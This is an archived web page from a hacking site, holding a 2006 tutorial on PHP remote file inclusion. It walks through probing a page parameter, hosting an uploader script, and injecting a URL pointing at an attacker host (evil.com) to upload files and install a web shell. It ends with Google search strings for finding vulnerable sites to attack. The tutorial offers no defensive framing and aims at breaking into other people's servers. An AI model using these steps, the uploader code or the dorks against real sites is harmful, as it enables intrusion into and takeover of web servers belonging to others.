HellBound Hackers
The measure of a mans life is not how well he dies, but how well he lives.
Wednesday, August 20, 2008
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
HellBoundHackers Additional:
Shop
Learn
Links
Communicate
Submit
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Interact
Other
HellBoundHackers Executive:
HellBoundHackers Leisure:
Donate
Has this website helped you?
px
If so, please donate a little to help out with hosting costs.
Members Online
Total Online: 39
Web Spiders: 5
Guests Online: 23
Members Online: 16
flame_1221, Phantom_Ghost, Futility, zbert, amede0, rex_mundi, nine-ball, maug, sirrex, M4zh4r, H4x0r_Z, saftey, ShapeShifters, gnot_ice, sharpskater80, slpctrl,

Registered Members: 34366
Newest Member: boyxunghe
Most Users online: 523
Latest Articles

Include Exploits


advertisement



website security Old but very effective technique to gaining to a web server

In this article I will teach you the basics of Include Exploits. If you understand php then this will help, although not much.

When a site uses one page to call all the others around a basic template, they can become subject to exploitation under certain circumstances.

e.g. http://www.abc.com/index.php?page=news

To test if its vulnerable, try changing it to abc or whatever

e.g. http://www.abc.com/index.php?page=abc

If its vulnerable you should get an error like this:

Warning: main(abc.php): failed to open stream: No such file or directory in /home/dir/public_html/index.php on line 01

Ok, now we are in business. We now know that the script takes $_GET['page'] and adds .php, then includes it.

e.g.
$page = $_GET ['page'] . ".php";
include ($page);

So, what we need now is an uploader to allow us to upload files on to there server. Here's some dazzling code written by cheesy himself:

<?php

if ( $userfile )
{
@$res=copy($userfile,"$userfile_name");
if ( !$res ){
print "Upload failed! n";
}else{
print "Upload of $userfile_name successful n";
}
}
?>

<FORM method=POST ENCTYPE="multipart/form-data">
File to Upload
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="5000000">
<INPUT NAME="userfile" TYPE="file" size=35>
<INPUT TYPE="submit">
</FORM>
</HTML>

So, we need to host this code on a server that doesnt support php or just edit your htaccess so your server treats it as html or whatever. A good, simple free host that doesnt support php and is quick, easy and anonymous is cjb.net

So to exploit the page simply add your url for the uploader script:

e.g. http://www.abc.com/index.php?page=http://evil.com/uploader

Remember if the site adds .php only the page variable be sure to leave it off. Then the uploader pops up and you can install webadmin or a web-based shell.

To find vulnerable sites, we can use our best friend, google. Good searches include:

inurl:"index.php?page=downloads"
inurl:"index.php?page=news.php"

Be imaginative :)

Thanks for reading and i hope you've learnt something new.

Will.

security article Posted by willeH on March 25 2006 - 19:27:42   |    20 Comments | 8175 Reads | Print print this tutorial
Guest
Username

Password

Remember Me


Bookmark This Page
Affiliates
Adverts

 


By using, viewing or obtaining any information contained on this site, you agree to the disclaimer.

© HellBound Hackers 2007- 2008. Since 3rd December 2004.

4723548 Unique Visits

Powered by HBH-Fusion